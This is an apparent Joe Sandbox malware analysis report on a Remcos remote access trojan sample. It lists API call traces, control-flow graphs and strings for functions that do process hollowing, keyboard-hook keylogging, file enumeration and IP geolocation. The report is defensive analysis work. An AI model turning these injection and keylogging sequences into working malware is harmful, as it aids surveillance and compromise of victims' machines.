                                                                                                                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                                                                                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                                                                                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                                                                                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                                                                                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                                                                                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                                                                                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                                                                                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\Public\Libraries\lhgtogaW.pif,00000104), ref: 0040E9EE
                                                                                                                                                                      • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                    • String ID: 8SG$8SG$Access Level: $Administrator$C:\Users\Public\Libraries\lhgtogaW.pif$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-V052BG$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                                                                                    • API String ID: 2830904901-1913959472
                                                                                                                                                                    • Opcode ID: a9e439ae16f60dc0f21f3a6ca9cc68708988549308dc9f1db3e32f4ba5f3dd34
                                                                                                                                                                    • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                                                                                                                                    • Opcode Fuzzy Hash: a9e439ae16f60dc0f21f3a6ca9cc68708988549308dc9f1db3e32f4ba5f3dd34
                                                                                                                                                                    • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004180EF Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 448 4180ef-418118 449 41811c-418183 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 418480 449->450 451 418189-418190 449->451 453 418482-41848c 450->453 451->450 452 418196-41819d 451->452 452->450 454 4181a3-4181a5 452->454 454->450 455 4181ab-4181d8 call 436e90 * 2 454->455 455->450 460 4181de-4181e9 455->460 460->450 461 4181ef-41821f CreateProcessW 460->461 462 418225-41824d VirtualAlloc Wow64GetThreadContext 461->462 463 41847a GetLastError 461->463 464 418253-418273 ReadProcessMemory 462->464 465 418444-418478 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->465 463->450 464->465 466 418279-41829b NtCreateSection 464->466 465->450 466->465 467 4182a1-4182ae 466->467 468 4182c1-4182e3 NtMapViewOfSection 467->468 469 4182b0-4182bb NtUnmapViewOfSection 467->469 470 4182e5-418322 VirtualFree NtClose TerminateProcess 468->470 471 41832d-418354 GetCurrentProcess NtMapViewOfSection 468->471 469->468 470->449 472 418328 470->472 471->465 473 41835a-41835e 471->473 472->450 474 418360-418364 473->474 475 418367-418385 call 436910 473->475 474->475 478 4183c7-4183d0 475->478 479 418387-418395 475->479 481 4183f0-4183f4 478->481 482 4183d2-4183d8 478->482 480 418397-4183ba call 436910 479->480 493 4183bc-4183c3 480->493 483 4183f6-418413 WriteProcessMemory 481->483 484 418419-418430 Wow64SetThreadContext 481->484 482->481 486 4183da-4183ed call 418503 482->486 483->465 488 418415 483->488 484->465 489 418432-41843e ResumeThread 484->489 486->481 488->484 489->465 492 418440-418442 489->492 492->453 493->478
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
                                                                                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                                                                                                                                                    • NtClose.NTDLL(?), ref: 004182F7
                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                                                                                                                                    • ResumeThread.KERNEL32(?), ref: 00418435
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                                                                                                                                    • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
                                                                                                                                                                    • NtClose.NTDLL(?), ref: 00418468
                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041847A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                    • API String ID: 3150337530-3035715614
                                                                                                                                                                    • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                                                                                                                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                                                                                                                                    • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                                                                                                                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004180EF Relevance: 54.5, APIs: 26, Strings: 5, Instructions: 289librarynativeloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
                                                                                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                                                                                                                                    • ResumeThread.KERNEL32(?), ref: 00418435
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041847A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$AddressHandleModuleProcSection$ThreadViewVirtual$ContextCreateCurrentFreeMemoryTerminateWow64$AllocErrorLastReadResumeUnmapWrite
                                                                                                                                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                    • API String ID: 1786873268-3035715614
                                                                                                                                                                    • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                                                                                                                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                                                                                                                                    • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                                                                                                                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1638 40a2b8-40a2cf 1639 40a2d1-40a2eb GetModuleHandleA SetWindowsHookExA 1638->1639 1640 40a333-40a343 GetMessageA 1638->1640 1639->1640 1643 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1639->1643 1641 40a345-40a35d TranslateMessage DispatchMessageA 1640->1641 1642 40a35f 1640->1642 1641->1640 1641->1642 1644 40a361-40a366 1642->1644 1643->1644
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                                                                                                                                    • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040A2ED
                                                                                                                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0040A34A
                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040A355
                                                                                                                                                                    Strings
                                                                                                                                                                    • Keylogger initialization failure: error , xrefs: 0040A301
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                    • String ID: Keylogger initialization failure: error
                                                                                                                                                                    • API String ID: 3219506041-952744263
                                                                                                                                                                    • Opcode ID: ec3267f7fe9ce1a5c416a87d0f27317f5ce465ea5ea3d17c54d1027c97c75435
                                                                                                                                                                    • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                                                                                                                                    • Opcode Fuzzy Hash: ec3267f7fe9ce1a5c416a87d0f27317f5ce465ea5ea3d17c54d1027c97c75435
                                                                                                                                                                    • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                                                                                                                    • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0040A433
                                                                                                                                                                    • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                                                                                                                                                    • ToUnicodeEx.USER32(00475144,0000005B,?,?,00000010,00000000,00000000), ref: 0040A461
                                                                                                                                                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                                                                                                                                    • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1888522110-0
                                                                                                                                                                    • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                                                                                                                    • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                                                                                                                                                    • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                                                                                                                    • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1672 274c10f1-274c1166 call 274c2c40 * 2 lstrlenW call 274c2c40 lstrcatW lstrlenW 1679 274c1168-274c1172 lstrlenW 1672->1679 1680 274c1177-274c119e lstrlenW FindFirstFileW 1672->1680 1679->1680 1681 274c11a0-274c11a8 1680->1681 1682 274c11e1-274c11e9 1680->1682 1683 274c11aa-274c11c4 call 274c1000 1681->1683 1684 274c11c7-274c11d8 FindNextFileW 1681->1684 1683->1684 1684->1681 1686 274c11da-274c11db FindClose 1684->1686 1686->1682
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 274C1137
                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 274C1151
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 274C115C
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 274C116D
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 274C117C
                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 274C1193
                                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 274C11D0
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 274C11DB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1083526818-0
                                                                                                                                                                    • Opcode ID: f001ca641254c74709b5338f27c189dd0b8f95dde49e071df44f16e4af5e188b
                                                                                                                                                                    • Instruction ID: a4dbf4da1368a7619d21ab885368dd02a86d2f56fe02f68b81d492fe2fbf0bda
                                                                                                                                                                    • Opcode Fuzzy Hash: f001ca641254c74709b5338f27c189dd0b8f95dde49e071df44f16e4af5e188b
                                                                                                                                                                    • Instruction Fuzzy Hash: 0B219176504348ABD720EA659C49FDB7B9CEF88718F00092EBA58D3190EB78D6448B96
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1688 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1693 41b3c5-41b3e6 InternetReadFile 1688->1693 1694 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1693->1694 1695 41b40c-41b40f 1693->1695 1694->1695 1696 41b411-41b413 1695->1696 1697 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1695->1697 1696->1693 1696->1697 1701 41b427-41b431 1697->1701
                                                                                                                                                                    APIs
                                                                                                                                                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                                                                                                                                    Strings
                                                                                                                                                                    • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                    • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                    • API String ID: 3121278467-91888290
                                                                                                                                                                    • Opcode ID: 715bb13e36d7f94650e38528baf69c40dba8c7692c2ea5b5f9dd98b44b5d3a7c
                                                                                                                                                                    • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                                                                                                                                    • Opcode Fuzzy Hash: 715bb13e36d7f94650e38528baf69c40dba8c7692c2ea5b5f9dd98b44b5d3a7c
                                                                                                                                                                    • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                                                                                                                                    • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                                                                                                                                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                                                                                                                                                      • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                                                                                                                                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                                                                                                                                                      • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                                                                                                                                      • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3950776272-0
                                                                                                                                                                    • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                                                                                                                    • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                                                                                                                                    • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                                                                                                                    • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                                                                                                                      • Part of subcall function 00413549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                                                                                                                                                      • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
